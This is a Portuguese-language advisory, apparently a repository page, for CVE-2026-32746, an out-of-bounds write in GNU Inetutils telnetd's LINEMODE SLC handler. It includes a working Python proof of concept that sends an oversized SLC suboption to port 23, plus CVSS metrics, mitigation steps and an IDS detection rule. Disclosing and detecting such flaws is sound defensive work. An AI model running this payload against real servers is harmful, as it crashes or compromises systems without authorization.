
Prova de conceito de exploit para CVE-2026-32746, uma vulnerabilidade crítica de execução remota de código no GNU Inetutils telnetd via estouro de buffer SLC do LINEMODE. Inclui análise técnica, métricas CVSS e orientações de mitigação.
Vulnerabilidade Crítica | CVSS 9.8 | Execução Remota de Código!
Afeta: GNU Inetutils Telnetd (versões anteriores a 2.7)
Tipo: OOB Write no manipulador de subopções LINEMODE SLC
Vetor de Ataque: Rede (Porta 23) | Sem autenticação necessária
Impacto: RCE com privilégios do processo Telnetd
Foi identificado um estouro de buffer por escrita fora dos limites (OOB Write) na função add_slc do daemon telnetd do GNU Inetutils. Esta falha permite que um atacante remoto injete código arbitrário por meio da manipulação das subopções SLC (Set Local Characters) do protocolo Telnet.
add_slc (processamento de caracteres locais).Um atacante pode explorar esta vulnerabilidade por meio de um payload Telnet malicioso que satura o buffer interno:
#!/usr/bin/env python3
import socket
import sys
# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC = b'\xff'
SB = b'\xfa'
SE = b'\xf0'
LINEMODE = b'\x22'
SLC = b'\x03'
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
# Payload gerado para estourar add_slc
malicious_slc = b"\x01\x03\x41" * 600 # Repetição de 600 vezes
payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE
print(f"[*] Enviando payload malicioso para {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, 23))
s.sendall(payload)
print("[+] Payload entregue. Verificando queda do serviço/RCE...")
⚠️ ¡AVISO! Este código é apenas para fins educacionais e de pesquisa. Seu uso em sistemas sem autorização é ilegal.
| Métrica | Valor | Descrição |
|---|---|---|
| Vetor | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Remoto, sem autenticação |
| Pontuação | 9.8 (CRÍTICO) 🔴 | Alto impacto na confidencialidade, integridade e disponibilidade |
| Publicação | 13 de março, 2026 | Última modificação: 5 de maio, 2026 |
✅ Atualizar o GNU Inetutils para a versão corrigida (pós-2.7).
🔹 Desabilitar o telnetd e migrar para SSH (recomendado).
🔹 Bloquear a porta 23 em firewalls de perímetro.
🔹 Configurar IDS/IPS para detectar sequências LINEMODE SLC anômalas.
alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)